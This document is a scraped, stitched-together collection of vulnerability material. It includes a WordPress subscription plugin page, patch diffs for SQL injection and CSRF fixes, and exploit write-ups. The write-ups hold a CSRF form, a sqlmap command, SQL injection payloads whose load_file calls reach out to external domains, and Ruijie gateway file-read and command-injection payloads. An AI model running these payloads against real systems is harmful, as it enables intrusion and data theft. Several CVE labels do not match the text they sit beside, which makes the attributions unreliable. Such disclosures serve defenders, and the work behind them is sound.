Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in MyThemeShop WP Subscribe plugin <= 1.2.12 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

If you aren’t building an email list, you’re missing out on the most powerful and consistent way to drive repeat visitors and customers to your website or blog. With an email list, you become less and less dependent on external sources of traffic, and gain more ability to interact with your blog’s audience.

We at MyThemeShop understand your need, and have developed a unique, cleanly coded, premium subscription plugin. We are now distributing it for FREE to give back to the WordPress community. We have been given so much by the WordPress community, it’s time to give back.

**WP Subscribe** is the only plugin you need to get the perfect subscription forms on your website. With optimized code, it loads before you can even blink your eye. If you’re a website owner, you can make a lot more money than regular blogs, which is why so many marketers focus on creating email lists. With the WP Subscribe plugin, you can do it in a simple yet effective way. Install the plugin, configure the widget and convert visitors into loyal email subscribers.

**Live demos:**

See the WP Subscribe Plugin in action on our demo page: http://demo.mythemeshop.com/sociallyviral/

**Why choose WP Subscribe from MyThemeShop:**

*   It’s the only free all-in-one plugin which offers Aweber, Mailchimp and FeedBurner.
*   Choose between Mailchimp, Aweber or FeedBurner.
*   Options to change text showing in subscription box.
*   Fully responsive.
*   Can be easily customized using custom CSS.
*   Can be used more than once in different sidebars.
*   Super lightweight.
*   Compatible with caching and SEO plugins.
*   Eye-catching design.
*   Position it anywhere where a widget is configured in your theme.

**Support**

All support for this plugin is provided through our forums. If you have not registered yet, you can do so here for **FREE**  
https://mythemeshop.com/#signup

If after checking our Free WordPress video tutorials here:  
https://mythemeshop.com/wordpress-101/  
&  
https://community.mythemeshop.com/tutorials/category/2-free-video-tutorials/

you are still stuck, please feel free to open a new thread, and a member of our support team will be happy to help.

Support link:  
https://community.mythemeshop.com/forum/11-free-plugin-support/

**Help to make it better**

MyThemeShop is a premium WordPress theme provider, and we develop premium plugins in our free time and distribute them for free to give back to the community. Though we take a lot of care while developing anything, we might have missed something useful or important. Please help us make it better by submitting your bug/suggestions/feedback on GitHub.

GitHub link: https://github.com/MyThemeShop/WP-Subscribe/

**Feedback**

If you like this plugin, then please leave us a good rating and review.  
Consider following us on Google+, Twitter, and Facebook

This section describes how to install the plugin and get it working.

1.  Upload the wp-subscribe folder to the to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  You can see **WP Subscribe** widget in widgets section.
4.  Add it in sidebar and footer and configure as you want.
5.  Enjoy!

**Plugin is not working**

Please disable all plugins and check if plugin is working properly. Then you can enable all plugins one by one to find out which plugin is conflicting with WP Subscribe.

Plugin doesnt work anymore on the newest versions of Wordpress. It's a pity, it was a great plugin!

Simple and works, thanks.

Support 0, the plugin removal working only direct na manual from wp folder !

Plugin works great, and the support team is AWESOME! They helped me customize the plugin for two of my websites.

It needs ID from feedburner, mailchip, aweber. If you don't use them, it wont work. Ability to use my hosting service wiill be good. Bacause my website gets very few hits. I cannot afford to use others services. It is better if the plugin is self contained rather than depending on others to deliver emails.

Read all 25 reviews

“WP Subscribe” is open source software. The following people have contributed to this plugin.

Contributors

*    MyThemeShop

**1.2.12**

*   Improved form accessibility

**1.2.11**

*   Added validation for name and email fields

**1.2.10**

*   Changed admin notices

**1.2.9**

*   Updated admin notices

**1.2.8**

*   Added consent field

**1.2.7**

*   Fixed SVN issue

**1.2.6**

*   Fixed PHP notices

**1.2.5**

*   Fixed aweber list issue

**1.2.4**

*   Fixed aweber issues

**1.2.3**

*   Fixed some CSS issues

**1.2.2**

*   Fixed some javascript issues
*   Fixed some credentials in Aweber
*   Improve Mailchimp class
*   Remove notices and warnings on some places
*   Change the behavior of saving mailing service lists

**1.2.1**

*   Provided backward compatibility for CSS
*   Provided backward compatibility for Scoped CSS
*   Remove magnific popup classes from inline form
*   Add loader when submitting form
*   Fixed inline form responsiveness
*   Minify the CSS File

**1.2.0**

*   Whole plugin is re-written in OOP
*   Huge performance Improvements
*   Moved JS and CSS folders inside assets folder
*   Enhanced: Functions are more organized in wps-helpers and wps-functions-options file.
*   Fixed: Missing and in-correct textdomain

**1.1.4**

*   Changed AWeber form URL to HTTPS

**1.1.3**

*   Added option to enable name field
*   Added MyThemeShop tab in “Add Plugins” page

**1.1.2**

*   Removed nonce from frontend

**1.1.0**

*   Replaced Feedburner HTTP link with HTTPS

**1.0.9**

*   Fixed spelling mistake in Pro Notification

**1.0.8**

*   Fixed translation and text domain issue

**1.0.7**

*   Fixed notification closing issue

**1.0.6**

*   Switched to PHP 5 style constructor method for the widget class

**1.0.5**

*   Improvement – input placeholder text hides on click.

**1.0.4**

*   Fixed AWeber signup issue

**1.0.3**

*   Fixed add\_query\_arg vulnerability

**1.0.2**

*   Added double opt-in possibility for Mailchimp

**1.0.1**

*   Fixed Title field saving issue in newly added widget
*   Fixed compatibility with other plugins using Mailchimp API

**1.0**

*   Official plugin release.

CVE-2021-36844: WP Subscribe

The Photo Gallery WordPress plugin through 1.6.3 does not properly escape the $_POST['filter_tag'] parameter, which is appended to an SQL query, making SQL Injection attacks possible.

File:

  

*   photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php**
    
    r2587758
    
    r2706797
    
     
    
    43
    
    43
    
          $bwg\_filter\_tag\_temp = WDWLibrary::get('filter\_tag\_' . $bwg, 0);
    
    44
    
    44
    
          if ( !empty($bwg\_filter\_tag\_temp) ) {
    
    45
    
     
    
            $filter\_tags = explode(",", $bwg\_filter\_tag\_temp);
    
     
    
    45
    
            $filter\_tags = array\_map('intval', explode(",", $bwg\_filter\_tag\_temp));
    
    46
    
    46
    
          }
    
    47
    
    47
    
        }
    
    48
    
    48
    
        else {
    
    49
    
     
    
          $filter\_tags = explode(",", $bwg\_filter\_tag\_temp);
    
     
    
    49
    
          $filter\_tags = array\_map('intval', explode(",", $bwg\_filter\_tag\_temp));
    
    50
    
    50
    
        }
    
    51
    
    51
    
    …
    
    …
    
     
    
    111
    
    111
    
              $join .= ' LEFT JOIN (SELECT GROUP\_CONCAT(tag\_id order by tag\_id SEPARATOR ",") AS tags\_combined, image\_id FROM  ' . $wpdb->prefix . 'bwg\_image\_tag GROUP BY image\_id) AS tags ON image.id=tags.image\_id';
    
    112
    
    112
    
          }
    
    113
    
     
    
          $where .= ' AND CONCAT(",", tags.tags\_combined, ",") REGEXP ",(' . implode($compare\_sign, $filter\_tags) . ')," ';
    
     
    
    113
    
          $where .= ' AND CONCAT(",", tags.tags\_combined, ",") REGEXP ",( %s )," ';
    
     
    
    114
    
          $prepareArgs\[\] = implode($compare\_sign, $filter\_tags);
    
    114
    
    115
    
        }
    
    115
    
    116
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-1281: Diff [2587758:2706797] for photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php – WordPress Plugin Repository

The Import WP WordPress plugin before 2.4.6 does not validate the imported file in some cases, allowing high privilege users such as admin to upload arbitrary files (such as PHP), leading to RCE

CVE-2022-1273

The Ad Invalid Click Protector (AICP) WordPress plugin before 1.2.7 does not have CSRF check deleting banned users, which could allow attackers to make a logged in admin remove arbitrary bans

Timestamp:

04/05/2022 12:27:06 PM (4 weeks ago)

isaumya

Message:

Adding nonce support for deletion of banned users  

Location:

ad-invalid-click-protector/trunk/inc

Files:

  

*   admin\_setup.php (1 diff)
*   banned\_user\_table.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **ad-invalid-click-protector/trunk/inc/admin\_setup.php**
    
    r2656496
    
    r2705068
    
     
    
    523
    
    523
    
                $bannedUserTableOBJ = new AICP\_BANNED\_USER\_TABLE();
    
    524
    
    524
    
                $aicpOBJ = new AICP();
    
    525
    
     
    
                if( 'delete'=== $bannedUserTableOBJ->current\_action() ) {
    
    526
    
     
    
                    global $wpdb;
    
    527
    
     
    
                    $fetchedID = $\_REQUEST\['id'\];
    
    528
    
     
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
    529
    
     
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
    530
    
     
    
                    } else { //for singel delete just the id will return
    
    531
    
     
    
                                $selectedID = '%d';
    
    532
    
     
    
                    }
    
    533
    
     
    
                    if( empty( $selectedID ) ) {
    
    534
    
     
    
                        $this->delete\_notice( false );
    
    535
    
     
    
                    } else {
    
    536
    
     
    
                        $query = $wpdb->prepare(
    
    537
    
     
    
                                    "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
    538
    
     
    
                                    $fetchedID
    
    539
    
     
    
                                );
    
    540
    
     
    
                        $wpdb->query( $query );
    
    541
    
     
    
                        $this->delete\_notice( true );
    
    542
    
     
    
                    }
    
    543
    
     
    
                }
    
    544
    
     
    
                /\* End of handelling the deletion process \*/
    
    545
    
     
    
                /\* Now it's time to show our data \*/
    
     
    
    525
    
                if( ( 'delete'=== $bannedUserTableOBJ->current\_action() ) && isset( $\_REQUEST\['nonce'\] ) && wp\_verify\_nonce( $\_REQUEST\['nonce'\], 'delete\_banned\_user' ) ) {
    
     
    
    526
    
                    global $wpdb;
    
     
    
    527
    
                    $fetchedID = $\_REQUEST\['id'\];
    
     
    
    528
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
     
    
    529
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
     
    
    530
    
                    } else { //for singel delete just the id will return
    
     
    
    531
    
                        $selectedID = '%d';
    
     
    
    532
    
                    }
    
     
    
    533
    
                    if( empty( $selectedID ) ) {
    
     
    
    534
    
                        $this->delete\_notice( false );
    
     
    
    535
    
                    } else {
    
     
    
    536
    
                        $query = $wpdb->prepare(
    
     
    
    537
    
                            "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
     
    
    538
    
                            $fetchedID
    
     
    
    539
    
                        );
    
     
    
    540
    
                        $wpdb->query( $query );
    
     
    
    541
    
                $this->delete\_notice( true );
    
     
    
    542
    
                    }
    
     
    
    543
    
                }
    
     
    
    544
    
                /\* End of handelling the deletion process \*/
    
     
    
    545
    
                /\* Now it's time to show our data \*/
    
    546
    
    546
    
                ?>
    
    547
    
    547
    
                <div class="wrap">
    
*   **ad-invalid-click-protector/trunk/inc/banned\_user\_table.php**
    
    r1565011
    
    r2705068
    
     
    
    34
    
    34
    
            public function column\_ip( $item ) {
    
    35
    
    35
    
                $actions = array(
    
    36
    
     
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id ),
    
     
    
    36
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s&nonce=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id, wp\_create\_nonce( 'delete\_banned\_user' ) ),
    
    37
    
    37
    
                );
    
    38
    
    38
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0191: Changeset 2705068 – WordPress Plugin Repository

WordPress Stafflist plugin version 3.1.2 suffers from a cross site request forgery vulnerability.

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A CSRF vulnerability exists in staff record remove functionality inWordPress Plugin Stafflist 3.1.2.This vulnerability allows an attacker to delete existing records bytriggring a CSRF html request, due to not validating wp_nouce token inthe request.# ExploitAs n authenticated user:<html>  <body>    <form action="http://localhost:10003/wp-admin/admin.php">      <input type="hidden" name="page" value="stafflist" />      <input type="hidden" name="remove" value="1" />      <input type="hidden" name="p" value="1" />      <input type="hidden" name="s" value="1" />      <input type="submit" value="Submit request" />    </form>  </body></html>

WordPress Stafflist 3.1.2 Cross Site Request Forgery

WordPress Stafflist plugin version 3.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection(Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable Code:$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?...  $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR      LOWER(firstname) LIKE '%{$w}%' OR      LOWER(department)  LIKE '%{$w}%' OR      LOWER(email) LIKE '%{$w}%'" : "");# Vulnerable URLhttp://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]# POC```sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'--cookie="wordpress_cookies_paste_here"```# POC Imagehttps://prnt.sc/AECcFRHhe2ib

WordPress Stafflist 3.1.2 SQL Injection

Covid 19 Travel Pass Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Covid 19 Travel Pass Management System  v1.0 SQLi## Author: nu11secur1ty## Date: 05.01.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management## Description:The `code` parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'was submitted in the code parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: code (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: page=view_pass&code=775545'+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''OR NOT 7325=7325 AND 'vRQn'='vRQn    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=view_pass&code=775545'+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT(ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'='HjrM    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=view_pass&code=775545'+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'='bdqR    Type: UNION query    Title: MySQL UNION query (NULL) - 10 columns    Payload: page=view_pass&code=775545'+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''UNION ALL SELECTNULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management)## Proof and Exploit:[href](https://streamable.com/huye3b)

Covid 19 Travel Pass Management System 1.0 SQL Injection

Toll Tax Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Toll Tax Management System v1.0 SQLi## Author: nu11secur1ty## Date: 04.07.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'was submitted in the id parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take administrator account control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: id (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''RLIKE (SELECT (CASE WHEN (5512=5512) THEN 0x31+(selectload_file(0x5c5c5c5c6f6b63316837336d766b6b727978386c627869633479647066676c39393461733176706d636330312e6e616d61696b6174697075746b6174615f747570616b6f2e6e65745c5c777a6d))+''ELSE 0x28 END)) AND 'XhmU'='XhmU    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''OR (SELECT 2787 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT(ELT(2787=2787,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CIPJ'='CIPJ    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''AND (SELECT 6043 FROM (SELECT(SLEEP(5)))rrdD) AND 'XHBJ'='XHBJ    Type: UNION query    Title: MySQL UNION query (NULL) - 6 columns    Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''UNION ALL SELECTCONCAT(0x716a7a7a71,0x5346494143536a6c474b6b47466d494770794552614258734b42674c475945726d5a757674474b73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System)## Proof and Exploit:[href](https://streamable.com/y9xo4q)

Toll Tax Management System 1.0 SQL Injection

RG-NBR-E Enterprise Gateway RG-NBR2100G-E was discovered to contain an arbitrary file read vulnerability via the url parameter in check.php.

**0x00 **Affected component(s)****

Affected: RG-NBR-E Enterprise Gateway RG-NBR2100G-E
Affected source code file：/check.php

**0x01 **Vendor of the product(s)** and **vulnerability type****

https://www.ruijie.com.cn/

Any file read vulnerability

**0x02 **Attack vector(s)****

Vulnerability file path ‘check.php’ ,

the ‘url’ parameter passed in is not strictly filtered.

It is directly brought into the function ‘indexAction’ — > file\_get\_contents($url),

resulting in an Any file read vulnerability,

which can read any file on the server.

**0x03 Suggest**

An issue was discovered in RG-NBR-E Enterprise Gateway RG-NBR2100G-E.

There is an Any file read vulnerability that can read any file on the server.

**0x04 **Source code analysis****

path：

/check.php

       
     function deleteFile($fileName)
        {
            $cmd = "rm -fr $fileName";
        public function indexAction() {
            $root = "/tmp/html/";
            $name = $_GET["url"];
            $url = $root.$name;
            if($name == FALSE){
                header("Location: /index.htm");
                exit();
            }
            if (file_exists($url)) {
                $fileContent = file_get_contents($url);
                echo $fileContent;
            } else if (file_exists($url.".gz")) {
                header("Content-Encoding: gzip");
                $fileContent = file_get_contents($url.".gz");
                echo $fileContent;
            } else {
                echo "404 Resource Not Found";
            }
        }

Vulnerability file path ‘check.php’ ,

the ‘url’ parameter passed in is not strictly filtered.

It is directly brought into the function ‘indexAction’ — > file\_get\_contents($url),

resulting in an Arbitrary file read vulnerability,

which can read any file on the server.

**Arbitrary file read vulnerability ：**

**payload：**

Read init.php PHP file：

    http://127.0.0.1:80/check.php?url=init.php

转载请注明：Adminxe's Blog » Ruijie-NBR Any file read vulnerability

CVE-2022-27983: Ruijie-NBR Any file read vulnerability – Adminxe's Blog

RG-NBR-E Enterprise Gateway RG-NBR2100G-E was discovered to contain a remote code execution (RCE) vulnerability via the fileName parameter at /guest_auth/cfg/upLoadCfg.php.

**0x00 **Affected component(s)****

Affected: RG-NBR-E Enterprise Gateway RG-NBR2100G-E
Affected source code file：/guest\_auth/cfg/upLoadCfg.php

**0x01 **Vendor of the product(s)** and **vulnerability type****

https://www.ruijie.com.cn/

Command Execution

**0x02 **Attack vector(s)****

Vulnerability file path ‘/guest\_auth/cfg/upLoadCfg.php’,

the ‘fileName’ parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload ( | ),

resulting in a command execution vulnerability,

which can obtain server permissions.

**0x03 Suggest**

An issue was discovered in RG-NBR-E Enterprise Gateway RG-NBR2100G-E. There is a Command Execution that can execute any harmful command on the serveron to control the server。

**0x04 **Source code analysis****

path：

/guest\_auth/cfg/upLoadCfg.php

       
     function deleteFile($fileName)
        {
            $cmd = "rm -fr $fileName";
            $res = exec($cmd, $out, $status);
        }

the ‘fileName’ parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload ( | ),

resulting in a command execution vulnerability.

**Command Execution ：**

**payload：**  

Feasibility of using Ping dnslog for detection：

    http://127.0.0.1:80/guest_auth/cfg/upLoadCfg.php?fileName=|ping p28b5r.dnslog.cn

转载请注明：Adminxe's Blog » Ruijie-NBR has a Command Execution vulnerability

Tag

#php